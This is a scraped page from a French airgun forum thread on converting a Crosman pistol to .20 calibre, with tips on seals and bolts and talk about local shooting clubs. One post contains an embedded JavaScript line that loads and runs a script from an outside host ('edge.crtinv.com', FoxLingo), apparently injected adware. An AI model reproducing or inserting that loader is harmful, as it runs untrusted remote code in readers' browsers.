Le forum sur les armes à air et .22
Bienvenue sur Airguns ... N'hésitez pas à vous inscrire pour participer à notre communauté et notre convivialité entre tout le monde !
Le forum sur les armes à air et .22
Bienvenue sur Airguns ... N'hésitez pas à vous inscrire pour participer à notre communauté et notre convivialité entre tout le monde !
Le forum sur les armes à air et .22
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.
Le forum sur les armes à air et .22

Vous êtes sur le forum référence francophone sur le tir de loisir aux armes à air et .22
 
AccueilAccueil  PortailPortail  Dernières imagesDernières images  RechercherRechercher  S'enregistrerS'enregistrer  Sujets RécentsSujets Récents  Connexion  Carte des membres  ARprotechARprotech  B.A.R. (BlackPool Air Rifles)  ATAPATAP  Armurerie Meyson  
Bienvenue sur AIRGUNS le forum référence en termes de tir de loisir aux armes à air et .22LR
-50%
Le deal à ne pas rater :
-50% Baskets Nike Air Huarache Runner
69.99 € 139.99 €
Voir le deal

 

 Crosman conversion calibre 0.20 (0.5mm)

Aller en bas 
+3
Engagé Guignol
wovokaa
the_klint
7 participants
Aller à la page : Précédent  1, 2
AuteurMessage
levry
Pilier
Pilier
levry


Masculin
Verseau Chat
Nombre de messages : 5858
Age : 60
Localisation : chez levry
Date d'inscription : 19/08/2009

Crosman conversion calibre 0.20 (0.5mm)  - Page 2 Empty
MessageSujet: Re: Crosman conversion calibre 0.20 (0.5mm)    Crosman conversion calibre 0.20 (0.5mm)  - Page 2 EmptyMar 6 Nov 2012 - 22:43

en faite l'angle en lui meme n'est pas tres tres important ( un foret fait bien l'affaire ) l'escentiel est qu'il couvre le joint du pousse plomb pour avoir le meilleur étanchéitée possible , le plus important apres c'est la position du levier c'est à dire la distance entre le joint et le levier ; trop court pas d'étanchéitée trop long tu ne peux pas verrouiller . j'espere d'etre claire Crosman conversion calibre 0.20 (0.5mm)  - Page 2 0trampol en tout cas si tu le fais faire n'oublie pas de lui laisser la culasse si non tu risque d'avoir des surprises Crosman conversion calibre 0.20 (0.5mm)  - Page 2 0trampol
Revenir en haut Aller en bas
the_klint
Vieil Habitué
Vieil Habitué
the_klint


Masculin
Balance Serpent
Nombre de messages : 615
Age : 46
Localisation : MASSY / PARIS
Date d'inscription : 08/01/2012

Crosman conversion calibre 0.20 (0.5mm)  - Page 2 Empty
MessageSujet: Re: Crosman conversion calibre 0.20 (0.5mm)    Crosman conversion calibre 0.20 (0.5mm)  - Page 2 EmptyMar 6 Nov 2012 - 23:00

Mais je pense que ça va être plus simple à partir d'un 1322 et réduire le pousse plomb en taille (pour justement bien crée l’étanchéité)...
Mais bon... oui sinon comme je vais avoir un 1377 en rab... je surement devoir refaire un pousse plomb à partir d'une tige laiton... Crosman conversion calibre 0.20 (0.5mm)  - Page 2 Wall

et sinon oui je ferais tout avec lui avec toutes les pièces sur place...
d'une pour surveiller le boulot... Crosman conversion calibre 0.20 (0.5mm)  - Page 2 Icon_rof
de deux pour apprendre Crosman conversion calibre 0.20 (0.5mm)  - Page 2 Smilejap
et de trois... je suis pas du genre à refiler le bébé et laisser les autres faire ^^
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
Revenir en haut Aller en bas
planteurmaster
Régulier
Régulier
planteurmaster


Masculin
Gémeaux Coq
Nombre de messages : 141
Age : 42
Localisation : longjumeau - essonne
Date d'inscription : 10/07/2012

Crosman conversion calibre 0.20 (0.5mm)  - Page 2 Empty
MessageSujet: Re: Crosman conversion calibre 0.20 (0.5mm)    Crosman conversion calibre 0.20 (0.5mm)  - Page 2 EmptyDim 18 Nov 2012 - 17:09

salut a tous,

the_klint, je me demandais où vas tu pour tirer ?
je demande car je suis a côté de chez toi et je ne connais pas tous les bons endroits.

V
Nico
Revenir en haut Aller en bas
the_klint
Vieil Habitué
Vieil Habitué
the_klint


Masculin
Balance Serpent
Nombre de messages : 615
Age : 46
Localisation : MASSY / PARIS
Date d'inscription : 08/01/2012

Crosman conversion calibre 0.20 (0.5mm)  - Page 2 Empty
MessageSujet: Re: Crosman conversion calibre 0.20 (0.5mm)    Crosman conversion calibre 0.20 (0.5mm)  - Page 2 EmptyDim 18 Nov 2012 - 19:45

Je ne connais pas les bonnes adresses dans le Sud (ni ailleurs d'ailleurs... j'ai surtout tiré dans ma cave et dans le jardin)... Je sais qu'il y a un club de tir à Antony (heureusement pour Toi) tout au Sud d'Antony dans la zone industrielle... Mais je n'y suis jamais allé j'habite sur Paris actuellement...
Si ça n'est pas un club qui te convienne... ils seront très certainement au courant d'autres clubs qui te conviendraient dans la région.

Tiens nous au courant ;)
Revenir en haut Aller en bas
planteurmaster
Régulier
Régulier
planteurmaster


Masculin
Gémeaux Coq
Nombre de messages : 141
Age : 42
Localisation : longjumeau - essonne
Date d'inscription : 10/07/2012

Crosman conversion calibre 0.20 (0.5mm)  - Page 2 Empty
MessageSujet: Re: Crosman conversion calibre 0.20 (0.5mm)    Crosman conversion calibre 0.20 (0.5mm)  - Page 2 EmptyMar 20 Nov 2012 - 18:49

salut,
j'ai un un voisin qui tire a Anthony mais je n'y suis pas encore allé.
Moi je tire a Villemoisson a "la cible de villemoisson".
C'est sympa mais pas d'excentricités genre 22 hunter, field target, que du 50m sur C50 , un stand 10m et un 25 m.
Pour l'instant c'est tout ce qu'il me faut pour m'amuser.
V

Nico
Revenir en haut Aller en bas
Contenu sponsorisé





Crosman conversion calibre 0.20 (0.5mm)  - Page 2 Empty
MessageSujet: Re: Crosman conversion calibre 0.20 (0.5mm)    Crosman conversion calibre 0.20 (0.5mm)  - Page 2 Empty

Revenir en haut Aller en bas
 
Crosman conversion calibre 0.20 (0.5mm)
Revenir en haut 
Page 2 sur 2Aller à la page : Précédent  1, 2
 Sujets similaires
-
» crosman 1377 - crosman 2240 - crosman 2300T
» conversion crosman 2240 pcp
» Benjamin Crosman en calibre 6,35 demande d'avis
» Plombs calibre 4.5 pour revolver à plomb Crosman Vigilante
» Carabine Crosman Fire Nitro Piston calibre 4.5mm 19.9 joules + Lunette 4x32

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Le forum sur les armes à air et .22 :: Les pistolets :: Les pistolets à air comprimé (PCP et piston/ressort)-
Sauter vers: